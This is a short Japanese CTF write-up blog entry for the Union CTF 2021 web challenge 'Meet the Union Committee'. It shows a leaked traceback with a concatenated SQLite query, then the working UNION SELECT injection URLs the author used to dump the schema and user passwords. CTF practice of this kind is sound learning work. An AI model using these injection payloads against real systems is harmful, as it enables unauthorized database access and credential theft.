Web

Meet the Union Committee

f:id:tekashi:20210221193630p:plain

<!--Login Broken, submit password as flag on https://ctf.cr0wn.uk/-->

総当りでログインページを探すのかと思ったが 429 Too Many Requests detected: Server is blocking requests と怒られるので違うっぽい

f:id:tekashi:20210221193840p:plain

http://34.105.202.19:1336/?id=2'と適当にアクセスすると

Traceback (most recent call last):
  File "unionflaggenerator.py", line 49, in do_GET
    cursor.execute("SELECT id, name, email FROM users WHERE id=" + params["id"])
sqlite3.OperationalError: unrecognized token: "'"

データベースは sqlite3でSQLインジェションがありそう。

http://34.105.202.19:1336/?id=-1 union select 1,2,3-- - f:id:tekashi:20210221193959p:plain

http://34.105.202.19:1336/?id=-1%20union%20select%201,sql,3%20from%20sqlite_master--%20- f:id:tekashi:20210221194041p:plain

http://34.105.202.19:1336/?id=-1%20union%20select%201,group_concat(password),3%20from%20users--%20- f:id:tekashi:20210221194120p:plain

flag: union{uni0n_4ll_s3l3ct_n0t_4_n00b}

kanyewest CTF

勉強したことをメモしています。

Union CTF 2021: Writeup

Web

Meet the Union Committee